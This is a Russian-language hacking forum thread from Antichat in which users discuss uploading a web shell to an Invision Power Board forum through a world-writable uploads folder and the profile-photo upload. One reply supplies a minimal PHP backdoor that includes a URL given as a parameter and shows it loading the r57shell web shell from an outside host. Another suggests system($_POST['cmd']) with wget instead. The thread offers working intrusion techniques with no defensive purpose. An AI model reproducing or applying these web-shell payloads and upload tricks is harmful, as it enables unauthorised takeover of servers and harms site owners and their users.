Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Что можно сделать, если нашел папку 0777 |
22.11.2005, 22:38
|
|
Новичок
Регистрация: 02.11.2005
Сообщений: 17
Провел на форуме:
69755
Репутация:
0
|
|
Что можно сделать, если нашел папку 0777
Есть на форуме папка с Chmod 0777
Можно как-нить в неё загрузить файл?
|
|
|
22.11.2005, 22:45
|
|
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567
Репутация:
-12
|
|
какие у тебя права и т.д?
|
|
|
|
22.11.2005, 22:50
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -))
Тоесть просто так всё равно ничё это не даёт.
|
|
|
|
13.02.2008, 01:37
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458
Репутация:
243
|
|
форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...  |
|
|
|
13.02.2008, 01:42
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются...
Шелл должен работать
|
|
|
|
13.02.2008, 01:54
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458
Репутация:
243
|
|
переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи.
шелл весит 100 кб )...нужно что-то поменьше
Последний раз редактировалось Витян; 13.02.2008 в 01:57..
|
|
|
|
13.02.2008, 01:57
|
|
Новичок
Регистрация: 06.03.2005
Сообщений: 19
Провел на форуме:
81759
Репутация:
5
|
|
Есть шеллы поменьше
|
|
|
|
13.02.2008, 02:03
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сложно подумать =\
Создай файл file.php.jpg
С содержимым:
PHP код:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>
И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php |
|
|
|
13.02.2008, 02:17
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от Isis
Сложно подумать =\
Создай файл file.php.jpg
С содержимым:
PHP код:
<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>
И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget
|
|
|
|
13.02.2008, 02:24
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от Piflit
на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget
На некоторых хостах запрещен system 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
